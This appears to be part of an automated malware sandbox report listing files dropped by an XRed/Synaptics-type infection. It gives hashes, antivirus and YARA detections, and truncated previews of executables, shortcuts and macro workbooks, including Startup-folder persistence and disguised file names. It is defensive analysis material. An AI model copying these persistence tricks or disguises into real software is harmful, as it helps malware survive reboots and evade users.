                                                                                                                                                                          SHA-512:BF119DCBCB9C0C30B8A1BD9452C17E17835287D5783455F5344CE8BB2ADA33249530DBFB18772B816A91C149A7DEF65A75A5BFBFD2E40A0E7EED591A86401737
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rL_Y_tqzUlYxSf4A-UDKfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\taRewij.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264268873246207
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0b2tBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1B+pAZewRDK4mW
                                                                                                                                                                          MD5:F6F8A6293381ECE1ACE722660272F459
                                                                                                                                                                          SHA1:FE714F2FCD99D8A33E50F2FD42BECEC7F54F6C42
                                                                                                                                                                          SHA-256:7194699C5478E04E62D647469B2BB597DC34D5C12404E090DBAB2AF9BDAE1BC4
                                                                                                                                                                          SHA-512:6868416518B4765454EC78F055DC6C06AA3B3A03909FE395501534A21EA8A3D060C6D843705B45FF246AA6F9C6E9BDBDE36762A56FB963617E55CB9257A7DE1D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dZwYMr05fZ8EL8QD1Waf3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\vFWmOVA.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.274261397374661
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0xzDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                                                          MD5:61D0AF1AD35AC4B0F9F2ACDB15D69151
                                                                                                                                                                          SHA1:684800281246FF1F6B1CDEB77D87F6671E50D3C2
                                                                                                                                                                          SHA-256:F31627C01AA649A4E936BEB93E19F667B1F6A577F6C6885CCE55630ADE9365FF
                                                                                                                                                                          SHA-512:CEF266C9D56DCE79F89C9226E7B8CECDA15C23C734731432C14B35F0BC4EE63EFB165ABA57A29377E70DA580B341D6BE79102B419FCF3B3588427EB33163F650
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IC6fUbNO7G6BEn8U8lOqCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\wBdXYfv.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271054625442911
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                                          MD5:72FE16051C00A0341D710FB59AB9B0B6
                                                                                                                                                                          SHA1:7043D2DFE2C8B721384A64544A7EEA0E3CAD0603
                                                                                                                                                                          SHA-256:6C698E648E5B7CAED2DE5BB0F12674C2F6F54ABFB0AE3BFCE1F81D6273A55533
                                                                                                                                                                          SHA-512:5DA296304B4FB98DBE97F2E7B3107664FA30388F141635488E8C1BAA872754AD2674063BDEB86EE946DA0012DAB7D47088EF4BD8BD0D7642CE2929FE837C15EE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SuEigAH0DxzVMKRPK7_hlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\xX3ZPY7.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.263639049105763
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0TASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                          MD5:C12EA14D6CF2FB1F02336E47B8520532
                                                                                                                                                                          SHA1:ACE6DCC84814B7A8EED57613DA79E29653096CB6
                                                                                                                                                                          SHA-256:5B6B069E29CB46C84D917B2255C9BD7F269EB17B8D4E5857272C030EE0277F23
                                                                                                                                                                          SHA-512:10AC504B1D90FEAC5ED80B3882481A9D980F43D83262FBAB517E6EC8C8115D06E5535083966274C8CBC11E5595740B0DAD061C2E1181BD6089BE2CBA610A9B8B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PjlcCJn6ASADLlAtEr0onA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~$1QGQHkIB.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~$YDcMLELS.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF6E5B3647D1F2B1DC.TMP

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):3.746897789531007
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                          MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                          SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                          SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                          SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF76A6807A37287301.TMP

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):3.746897789531007
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                          MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                          SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                          SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                          SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:48:44 2024, mtime=Mon Dec 30 09:48:44 2024, atime=Mon Dec 30 09:48:44 2024, length=1436672, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1808
                                                                                                                                                                          Entropy (8bit):3.4253439503157814
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:86SolSoX8sXS497WkChLY//o3MLe/0cIA+AK/wLEjAG/H8WURBMJW2+UNP1zTlDM:85Lg1HCeeQx4LQAgU8E2+s9T4Il9NDm
                                                                                                                                                                          MD5:0D01D44F9AD7C193DE5A867520C37F4D
                                                                                                                                                                          SHA1:6F217CFBD4DD8C137AEFBC96E87B0E52733DE69D
                                                                                                                                                                          SHA-256:26056D122196265BC2137D2816916D6A2906421241B003B74F5E0EDAC0F877C5
                                                                                                                                                                          SHA-512:77751AB0C20529E7CFE9BC162A50672B4CE5A6752AC29A55F146C6E2E85EFDE07FA2F205E1EF6DD377447F728ABCC446D7ADCF83A3CCA487B398709118466B1E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.@.. ....cue.Z....we.Z....we.Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......[.Z..$\.f.Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.V..........................d...A.p.p.D.a.t.a...B.V.1......Y.V..Roaming.@......EW)B.Y.V............................Z.R.o.a.m.i.n.g.....V.1......Y.V..Windata.@......Y.V.Y.V.....)........................W.i.n.d.a.t.a.....`.2......Y.V .TCPKPY.exe..F......Y.V.Y.V.....)....................'5#.T.C.P.K.P.Y...e.x.e.......a...............-.......`............N.......C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.C.P.K.P.Y...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\Documents\IPKGELNTQY\NEBFQQYWPS.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                          C:\Users\user\Documents\IPKGELNTQY\~$NEBFQQYWPS.xlsx

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                          C:\Users\user\Documents\IPKGELNTQY\~$cache1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
